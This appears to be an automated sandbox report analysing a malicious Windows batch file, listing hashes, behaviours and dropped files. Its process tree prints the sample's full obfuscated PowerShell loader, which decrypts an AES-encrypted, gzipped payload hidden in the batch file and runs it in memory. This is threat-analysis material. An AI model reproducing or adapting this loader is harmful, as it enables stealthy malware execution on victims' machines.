Analysis
-
max time kernel
0s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system -
submitted
08/01/2024, 20:50
Static task
static1
Behavioral task
behavioral1
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win10v2004-20231215-en
General
-
Target
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
-
Size
1.6MB
-
MD5
4fbb5e9e5b5690f1b361f9f67d10e25c
-
SHA1
b77eeb5b8b08f5dfa427cd078423e4f190a28c41
-
SHA256
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3
-
SHA512
640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770
-
SSDEEP
24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process
3032 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
-
Loads dropped DLL 1 IoCs
pid Process
2248 cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target
PID 2248 wrote to memory of 3032 2248 cmd.exe 19
PID 2248 wrote to memory of 3032 2248 cmd.exe 19
PID 2248 wrote to memory of 3032 2248 cmd.exe 19
Processes
-
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
"310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
PID:3032
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize 7KB
MD5 1a55940ea67fa5fc262a46a272504c58
SHA1 6f000a45239b343de83ce80f9a3ad0970e9ca010
SHA256 0f92483bb3e37523ffb9dd2e62e43974306b66d21ddf9b70c4e8c98f93746e91
SHA512 b30f6327104ad5e65f6f6d8b3ac41b927a60a550feb7b8815a6dbc8b46cc2b99519a06f3ba78a9460be8d7ade82b1cde0c3a7e41d2deee91fc6175fc9f7ad639
-
\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize 18KB
MD5 055e9ad68a7ed922ac8b376c96270622
SHA1 bf15d9df06764e9045c65f7136c9b1dbae9e36c4
SHA256 57f286509d4a5a66f9d77d54360e6caa39241af533b51f731f7285274877b95a
SHA512 841613348027c97221d975f3d62a31ced41ebc96333eee2cefed8c00704975418ef739aeeec9762290236de48f0226ef03a43d3af4e2c4e561fc703684423435